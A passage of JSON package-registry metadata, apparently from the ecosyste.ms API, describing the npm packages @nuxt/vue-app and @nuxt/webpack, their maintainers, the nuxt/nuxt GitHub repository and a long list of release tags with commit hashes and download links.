/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-app/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-app/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-app/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages/@nuxt%2Fvue-app/codemeta","maintainers":[{"uuid":"pi0","login":"pi0","name":null,"email":"pyapar@gmail.com","url":null,"packages_count":689,"html_url":"https://www.npmjs.com/~pi0","role":null,"created_at":"2022-11-20T01:59:34.965Z","updated_at":"2022-11-20T01:59:34.965Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/pi0/packages"},{"uuid":"antfu","login":"antfu","name":null,"email":"anthonyfu117@hotmail.com","url":null,"packages_count":733,"html_url":"https://www.npmjs.com/~antfu","role":null,"created_at":"2022-11-20T01:59:34.917Z","updated_at":"2022-11-20T01:59:34.917Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/antfu/packages"},{"uuid":"atinux","login":"atinux","name":null,"email":"atinux@gmail.com","url":null,"packages_count":378,"html_url":"https://www.npmjs.com/~atinux","role":null,"created_at":"2022-11-20T01:59:34.939Z","updated_at":"2022-11-20T01:59:34.939Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/atinux/packages"},{"uuid":"danielroe","login":"danielroe","name":null,"email":"daniel@roe.dev","url":null,"packages_count":434,"html_url":"https://www.npmjs.com/~danielroe","role":null,"created_at":"2022-11-20T01:59:34.979Z","updated_at":"2022-11-20T01:59:34.979Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/danielroe/packages"},{"uuid":"nuxtbot","login":"nuxtbot","name":null,"email":"nuxtbot@roe.dev","url":null,"packages_count":148,"html_url":"https://www.npmjs.com/~nuxtbot","role":null,"created_at":"2023-08-19T18:25:39.485Z","updated_at":"2023-08-19T18:25:39.485Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers/nuxtbot/packages"}],"registry":{"name":"npmjs.org","url":"https://registry.npmjs.org","ecosystem":"npm","default":true,"packages_count":5608775,"maintainers_count":1189233,"namespaces_count":373614,"keywords_count":0,"github":"npm","metadata":{"funded_packages_count":166557},"icon_url":"https://github.com/npm.png","created_at":"2022-04-04T15:19:23.081Z","updated_at":"2026-04-03T05:46:01.652Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/npmjs.org/namespaces"}},{"id":1096146,"name":"@nuxt/webpack","ecosystem":"npm","description":null,"homepage":"https://github.com/nuxt/nuxt#readme","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/nuxt/nuxt","keywords_array":[],"namespace":"nuxt","versions_count":67,"first_release_published_at":"2018-11-16T14:17:26.311Z","latest_release_published_at":"2024-06-28T11:35:09.673Z","latest_release_number":"2.18.1","last_synced_at":"2026-03-18T14:08:04.450Z","created_at":"2022-04-08T10:39:37.806Z","updated_at":"2026-03-18T14:08:04.451Z","registry_url":"https://www.npmjs.com/package/@nuxt/webpack","install_command":"npm install @nuxt/webpack","documentation_url":null,"metadata":{"funding":null,"dist-tags":{"2x":"2.16.2","latest":"2.18.1"}},"repo_metadata":{"id":37288797,"uuid":"71995937","full_name":"nuxt/nuxt","owner":"nuxt","description":"The Intuitive Vue Framework.","archived":false,"fork":false,"pushed_at":"2024-10-29T20:55:49.000Z","size":114898,"stargazers_count":54703,"open_issues_count":872,"forks_count":5004,"subscribers_count":793,"default_branch":"main","last_synced_at":"2024-10-29T21:25:05.500Z","etag":null,"topics":["csr","framework","full-stack","hacktoberfest","hybrid","node","nuxt","server-rendering","ssg","ssr","static-site-generator","universal","vue"],"latest_commit_sha":null,"homepage":"https://nuxt.com","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/nuxt.png","metadata":{"files":{"readme":"README.md","changelog":"changelog.config.json","contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null},"funding":{"github":["nuxt"],"open_collective":"nuxtjs"}},"created_at":"2016-10-26T11:18:47.000Z","updated_at":"2024-10-29T18:14:58.000Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":222121833,"owners_count":16934971,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.